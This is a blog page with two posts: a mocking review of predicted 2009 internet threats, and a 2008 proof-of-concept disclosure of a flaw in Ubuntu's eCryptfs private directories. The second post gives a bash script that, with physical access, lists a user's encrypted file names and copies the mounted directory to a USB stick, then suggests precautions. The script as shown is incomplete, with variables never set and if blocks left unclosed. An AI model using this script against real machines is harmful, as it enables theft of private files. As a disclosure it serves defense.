jump to navigation

4 New Fear Mongering Tactics in 2009 3 January, 2009

Posted by aronzak in security.
Tags: , , , ,
add a comment

An article on Slashdot today links to another article “Four Threats For ’09 That You’ve Probably Never Heard Of (Or Thought About)”. They give us four things that are new threats and will surely break the internet and cause much panic in 2009 (specifically; not any other year). Here they are:

1. An Internet “e-bomb”

A large ‘bomb’ will destroy the internet. How do we come to this conclusion? There’s some flaws in TCP and DNS.

Attacks against the Internet infrastructure could very easily be next year.

Let me give you some very good wisdom from a well respected expert:

And again, the Internet is not something that you just dump something on. It’s not a big truck. It’s a series of tubes.

No, someone can’t ‘break’ the internet. It might be possible to break some of the “tubes” but not the whole series. Why? It’s not a big truck. The worst that could happen is that the internet becomes partially fragmented. And that wouldn’t be that bad. I don’t think that disruptions could last more than a few days (but you’re welcome to try!). There are backup systems for things like this. Why do we still have real stock market floors?

2. Radical extremist hackers

Attackers defaced more than 300 sites with anti-Israeli and anti-U.S. messages in the wake of Israel’s bombing of Gaza.

So a few pro Israeli sites get hit. Surprise!

3. Attacks on online ad revenue
Ok, this is the only interesting one that isn’t just the same fear tactics dressed up. This is a genuinely new emergence. If malicious hackers use compromised ad servers to spread malware, then people will block ads. This has already largely happened with popup blocking. It’s one of the reasons that NoScript exists, which makes about half of the ads that are on the wabpages I look at just appear as white space. The internet ad ecosystem currently doesn’t work very well. Already it has been found that some people are more likely to click on ads but have no intention to buy anything. They are an anomaly that means that the whole profit model is flawed.

Unfortunately, this hurts the little guys, because they end up being the ones that serve up unique content that smart users will want to look at. These are the smart users that run Fx and respond to emerging threats.

Still, this isn’t going to break the internet. Also, with the internet getting faster, bandwidth is getting cheaper. How can sites that stream megabytes of video with only a few ads on a page make money? Well, megabytes aren’t as big as they were.

4. Human casualties

This is the most and least real threat.

Three U.K. hospitals were forced to shut down their networks last month after a malware outbreak infiltrated their systems… Medical staff in some cases had to revert to using pen and paper… Human lives could be affected by a cyberattack like that of those hospitals or attacks on national infrastructures

Yes, people could die as a result of a malicious intruder attacking a hospital. Then again, it probably wouldn’t jsut happen at random. The idea that people all over the place could die just because of viruses is ridiculous. Almoast as ridiculous as this:

Proof of concept: Attacking eCrypt Private Directories 6 November, 2008

Posted by aronzak in Encryption, Linux, security, Ubuntu.
Tags: , , , , , , , ,

In the new version of Ubuntu, Intrepid Ibex, users have the option of setting up a private encrypted directory in their home folder. For convenience, this uses pam to mount it without the need to set and remember a password. This is convenient, and makes cryptography accessible to the non tech savvy, however, convenience is usually at the detriment of security, and this seems to be no exception.

Placing your files in an encrypted home directory can defeat attempts to access the files from other users and live users (with root privileges). It does, however, mark these files out as of interest. Additionally, while the files themselves are encrypted, the file names are not masked, and can be read by a user with sufficient privileges, possible giving an indication of the contents..

Thus, it is possible to simply copy the whole folder off the system if it is left open. That means that if an adversary manages to get physical access to your machine while you are logged in, (even when you are not logged in, if they have your password) they can quickly plug in a usb stick and execute the following script on it. The following is a proof of concept for an attack to copy off the list of file names of the private directory, and if mounted, steal the contents.

# eCrypt Proof of Concept
# Version 0.9 beta
# Aronzak (aronzak.wordpress.com)

echo "Aronzak's eCrypt attack Proof of Concept Beta"

date=`date +%F`

mkdir -p $dir/attack/
mkdir -p $dir/attack/manifest
echo "Username:" > $dir/attack/manifest/$date
echo $user >> $dir/attack/manifest/$date
echo "Manifest:" >> $dir/attack/manifest/$date

echo -n "Taking manifest: "
echo $dir/attack/manifest/$date
find ~/.Private >> $dir/attack/manifest/$date

echo -n "Checking if directory is mounted: "

check=`ls -l ~/Private| grep -c "THIS DIRECTORY HAS BEEN UNMOUNTED TO PROTECT YOUR DATA --  Run mount.ecryptfs_private to mount again -> /sbin/mount.ecryptfs_private"`

if [ $check = "1" ]; then
	echo "Foiled once more!"
	echo "Directory was not mounted." >> $dir/attack/manifest/$date
if [ $check = "0" ]; then
	echo "Victory is assured!"
	echo -n "Calculating size of directory: "
	du -hs ~/Private >> $dir/attack/manifest/$date
	size=`cat $dir/attack/manifest/$date | tail -n 1 | cut -f 1`
	echo $size
	gsize=`cat $dir/attack/manifest/$date | tail -n 1 | cut -f 1 | grep -c G`
	if [ $gsize = "1" ]; then
		echo "Warning: This is larger than a gigabyte."
	echo "Press Ctrl+C to abort: "
	read -s input
	echo -n "Copying: "
	mkdir -p $dir/attack/$date/
	cp -r ~/Private $dir/attack/$date/
	echo "Done"

And this is the expected output if not mounted:

Aronzak's eCrypt attack Proof of Concept Beta
Taking manifest: /home/aronzak/attack/manifest/2008-11-06
Checking if directory is mounted: Foiled once more!

And if mounted:

Taking manifest: /home/aronzak/attack/manifest/2008-11-06
Checking if directory is mounted: Victory is assured!
Calculating size of directory: *****(omitted)
Press Ctrl+C to abort:
Copying: Done

So, this should be able to copy files from one user’s home directory straight to a usb stick. A warning will be given if the files are over one gigabyte.

There are two precautions to avoid this. One is to create ‘junk’ files that take up more than a gigabyte of space. That will make it harder to copy the contents to a usb stick, as it will make it slower, and many usb sticks will not have the space.

The other is to set up eCrypt to use a real password (rather than using a generated one with pam) or upgrade to a stronger system, like truecrypt. It seems that the time honoured approach difficulty of choosing, remembering and typing a sufficiently complicated password pays off when it comes to the security benefit. Also, this gives you access to your files regardless of OS.

Finally, if you are someone that has or intends to write a guide about how to set up eCryptfs-tools, please make it clear that the system is not fully secure.